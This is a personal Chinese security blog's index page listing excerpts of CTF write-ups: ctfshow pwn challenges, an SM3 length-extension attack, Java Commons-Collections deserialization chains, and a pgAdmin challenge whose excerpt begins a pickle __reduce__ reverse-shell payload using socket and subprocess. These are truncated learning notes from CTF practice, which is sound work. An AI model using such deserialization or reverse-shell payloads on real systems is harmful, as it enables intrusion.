avatar
文章
47
标签
41
分类
25

主页
zx's Blog
主页

zx's Blog

心情不好写点 & 2024年8月总结
发表于2024-09-02|日常
9.2 8:36目前是9.2的8:36,title很明显,心情不好,不过因为现在还是早上,先干点活吧。本来昨晚是想写的,果然还是半夜比较有灵感,但是笔记本丢工位了,早上写感觉也写不出什么。 9.2 9:53突然想到个点子,要不每个月写一篇总结吧,这篇就可以当八月的总结帖用,ok。唉,周一还得上课,无聊死了。 上周一这个点tm在看BROP的论文,这周在看SROP,也没人跟我说学pwn得看论文啊,看到英文就犯困(悲)。 https://www.bilibili.com/video/BV1jy411q7eY/?spm_id_from=333.999.0.0(真tm好听,全靠这个活着) 9.2 11:04划重点,没带课本,用这玩意记一下 p1.最后一段最后一行-p2第一段第一行 p2 第二段-p3第一段第二行 p3 第二段第五行 p4 最后一段 -倒数第二段第一行到以下每一段的第一行 - p5每一段第一行 p7 第二段最后一句 p11 第二段第一句 p13 倒数第二段 p14 第二段,下一段第一句 9.2 16:36坏了,真心情不好了,唉。 难道说高温会让人变得易怒吗,好像也有这么个说法。 ...
pwn0-34
发表于2024-06-28|pwn
0x00 入门pwn0使用ssh连接上即可获得flag,在一大段ai的臆想之后,终于可以使用ssh执行命令了,flag在根目录的ctfshow_flag里面 pwn1跟题意说的一样,使用nc连接上之后就可以直接获取flag, 使用ida反编译附件可以发现,其实就是在连接到nc之后这个程序就自动执行了cat flag的操作 pwn2依旧是同样的操作,使用nc连接上之后,执行命令获取flag 可以看system启动了/bin/sh 就是启动了一个交互式的命令行,通过nc连接之后可以远程执行命令 pwn3依旧是使用ida分析一下 其实就是一个简单的switch来决定要运行哪个函数,其实靠蒙也能蒙出来(其实看也能看出来),但是我们可以发现,选项4和选项6都是调用的一个函数,跟进后可以发现 12345678910ctfshow():int ctfshow(){ return system("echo /ctfshow_flag");}system_func():int system_func(){ return sy ...
sm3长度拓展攻击
发表于2024-05-08|LengthExtensionAttack
sm3长度拓展攻击在打ctf的时候遇到的一道hash_append题,找了很久的脚本但是没一个能用之后非常生气,所以自己写一个 在已知原来的secretInfo的长度和hash之后,如何在补上append_data之后,预测到新的hash 即: 12new_hash = sm3(secretInfo+append_data)求解 new_hash 也就是说,在不知道secretInfo,只知道len(secretInfo)和sm3(secretInfo)的情况下,如何计算new_hash 那么这里的难点其实在于如何生成append_data 分析:首先看已知条件,hash其实是由V _i+1 = CF(V_i , B_i )得到的V_i+1 例如:对于secretInfo为’abcd’*16,即官方文档中的61626364 61626364 61626364 61626364 61626364 61626364 61626364 61626364 61626364 61626364 61626364 61626364 61626364 61626364 61626364 6 ...
java反序列化cc3
发表于2024-04-29|java反序列化
CC3链适用版本:CC 3.1-3.2.1, jdk < u71 cc3和cc1最大的不同在于最后调用危险方法的途径不同,cc1是以Runtime命令执行,而cc3是以加载动态字节码的方式执行危险方法
DASCTF × GFCTF-web,misc
发表于2024-04-23|dasctf
misc-tele没写出来,贴考点吧,下次多注意一下特殊的协议。 STUN(Session Traversal Utilities for NAT)是一种网络协议,用于在NAT(Network Address Translation,网络地址转换)后面的设备之间建立通信会话。它主要用于解决在实时通信中遇到的NAT穿越问题,比如VoIP、视频会议等应用。 STUN协议的主要功能包括: 发现公共IP地址:STUN客户端可以向STUN服务器发送请求,以发现客户端的公共IP地址和端口号。这对于P2P通信非常重要,因为它允许客户端知道其在Internet上的可访问地址。 检测NAT类型:STUN协议还可以帮助客户端识别其所在网络中的NAT类型,比如全锥形NAT、对称NAT、端口受限对称NAT等。这对于选择合适的通信策略非常重要。 解决对称NAT的问题:对称NAT会为每个不同的目标地址和端口分配不同的公共地址和端口。STUN协议通过与STUN服务器的交互,使得在同一NAT后面的两个设备可以互相发现对方的公共地址和端口,从而实现P2P通信。 虽然STUN协议可以帮助解决NAT穿越的问题,但它并 ...
java反序列化cc1
发表于2024-03-30|java反序列化
CC1链适用版本:CC 3.1-3.2.1, jdk < u71 poc:12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;impor ...
attack_tacooooo
发表于2024-03-27|nkctf
思路这个题比较抽象,长话短说,getshell是很简单的,就是找不到flag(我是fw) 首先题目是pgadmin,在我写这个的时候题目已经有提示了,账号是tacooooo@qq.com,那密码自然就是tacooooo,弱密码登录 谷歌搜索pgadmin最新漏洞可以查到一篇文章,非常滴详细呀,而且登录进系统之后也可以看看pgadmin的版本,刚刚好可以用,照抄就可以拿到shell 解题这里拿到shell的方式也不止一种,我自己用的是nc,但是LaoGong里面拿shell的方式感觉很有意思(我见识少了),是用的socket(这里copy一下,膜拜) 12345678910111213import pickleimport osimport pickletoolsclass exp(): def __reduce__(self): return (exec, ("import socket,subprocess,os; ...
全世界最简单的CTF
发表于2024-03-27|nkctf
源代码12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152const express = require('express');const bodyParser = require('body-parser');const app = express();const fs = require("fs");const path = require('path');const vm = require("vm");app .use(bodyParser.json()) //以json格式接收参数 .set('views', path.join(__dirname, 'views')) .use(express.static(path.join(__dirname, '/public') ...
hackjs
发表于2024-03-21|vctfweb
源代码1234567891011121314151617181920212223242526272829303132333435363738394041const express = require('express') //从package.json可以得知express的版本为4.17.2const fs = require('fs')var bodyParser = require('body-parser');const app = express()app.use(bodyParser.urlencoded({ extended: true})); //定义bodyParser可以解析的数据格式,extended为true表示可以以数组的方式解析url编码数据app.use(bodyParser.json());app.post('/plz', (req, res) => { venom = req.body.venom if (O ...
test
发表于2024-03-21
test the first test beyond hello-world
Hello World
发表于2023-12-18
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment
1…34
avatar
zx
文章
47
标签
41
分类
25
Follow Me
公告
This is my Blog
最新文章
一代壳demo2026-03-17
frida hook write guide2026-03-12
kuaidi_reverse_notes2026-03-10
CVE-2015-3636复现2026-03-01
how_to_build_rag_model_by_dify_and_neo4j2025-05-25
分类
  • LengthExtensionAttack1
  • ai2
  • ciscn1
    • ccb1
  • dasctf1
  • java反序列化2
  • leetcode1
  • nkctf2
标签
dasctf vctf brop 强网拟态 复现 misc src ctfshow ai sm3 鹏城杯 学习 网鼎杯 青龙组 游戏 ciscn crypto 恋爱 节日 frida newstarctf ccb re reverse arm 考研 全书整理 作业 cve 空间清理 gfctf leetcode 算法 日常 java反序列化 机器学习 web 阅读 nkctf 莫名其妙
归档
  • 三月 20264
  • 五月 20251
  • 四月 20252
  • 三月 20255
  • 二月 20252
  • 一月 20251
  • 十二月 20245
  • 十一月 20243
网站资讯
文章数目 :
47
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2026 By zx
框架 Hexo|主题 Butterfly